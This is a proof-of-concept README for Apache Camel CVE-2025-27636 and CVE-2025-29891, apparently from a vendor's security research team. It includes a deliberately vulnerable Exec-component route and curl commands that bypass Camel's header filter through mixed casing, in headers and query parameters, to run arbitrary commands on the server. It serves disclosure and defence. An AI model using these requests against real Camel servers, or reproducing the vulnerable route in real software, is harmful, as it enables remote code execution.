# Apache Camel CVE-2025–27636 & CVE-2025-29891 PoC

[CVE-2025–27636](https://nvd.nist.gov/vuln/detail/CVE-2025-27636) and [CVE-2025-29891](https://nvd.nist.gov/vuln/detail/CVE-2025-29891) are vulnerabilities in Apache Camel that affect versions:
4.10.0-4.10.1, 4.8.0-4.8.4, 3.10.0-3.22.3. 
Exploitation of these vulnerabilities can enable attackers to execute internal Camel methods.

The following is a sample vulnerable application that utilizes the Camel Exec component, which can be exploited to achieve RCE. Other Camel components could be exploited in a similar manner.

## Building

1. Install java and Maven
2. Build the project by running: 
 ```
 mvn clean package
 ```
 3. Run the app:
 ```
 mvn exec:java -Dexec.mainClass=camel.vulnerable.VulnerableCamel
 ```

## Exploiting CVE-2025–27636 & CVE-2025-29891

The app exposes an HTTP endpoint that is meant to execute the "whoami" command and return the result to the client.
The "Exec" Camel component is configured to execute the command, which is statically defined in the code.

```
// recieve request from client and pass it to the "Exec" camel component
from("jetty:http://0.0.0.0:80/vulnerable")
.log("Received request from client")
// define a static command. This can be overwritten using the "CamelExecCommandExecutable" header
.to("exec:whoami") 
.convertBodyTo(String.class) 
.log("Command Output: ${body}");
```

### CVE-2025–27636
Despite the fact the command is static, we can overwrite it by passing the *CamelExecCommandExecutable* header, which ([as specified in the docs](https://camel.apache.org/components/4.10.x/exec-component.html#:~:text=CamelExecCommandExecutable)) overwrites the static URI.
Apache Camel is supposed to filter such headers, but due to incorrect handling of casing, passing the header "**CA**melExecCommandExecutable" bypasses the filter.

Executing the following command will override the static "whoami" command and instead run an arbitrary command:

```
$ curl "http://localhost:80/vulnerable" --header "CAmelExecCommandExecutable: ls"
pom.xml
src
target
```

We can also pass arguments by specifying the *CamelExecCommandArgs* header:

```
$ curl "http://localhost:80/vulnerable" --header "CAmelExecCommandExecutable: ping" --header "CAmelExecCommandArgs: -c 2 8.8.8.8"
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=128 time=98.9 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=128 time=46.4 ms

--- 8.8.8.8 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1012ms

```

If we pass the "normal" header, we will note that exploitation fails and the static "whoami" command executes normally:

```
$ curl "http://localhost:80/vulnerable" --header "CamelExecCommandExecutable: ls"                                               
kali
```

### CVE-2025–29891

Originally, it was believed that request headers were the only exploitation vector. However, Akamai’s security research team reported an additional vector to the Apache Camel development team, leading to the assignment of CVE-2025-29891.
This issue originates from the same filtering flaw as CVE-2025-27636, and enables invoking internal methods through request parameters.

In the following example, we can see that specifying the “CAmelExecCommandExecutable” query parameter leads to arbitrary command execution - just like the original header vector:

```
$ curl "http://localhost:80/vulnerable?CAmelExecCommandExecutable=ls"
pom.xml
src
target
```

The original patch that was implemented to fix CVE-2025-27636 solves this issue as well, so applications that use up-to-date versions of Apache Camel are not vulnerable to this exploitation vector.


## License
Copyright 2025 Akamai Technologies Inc.

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.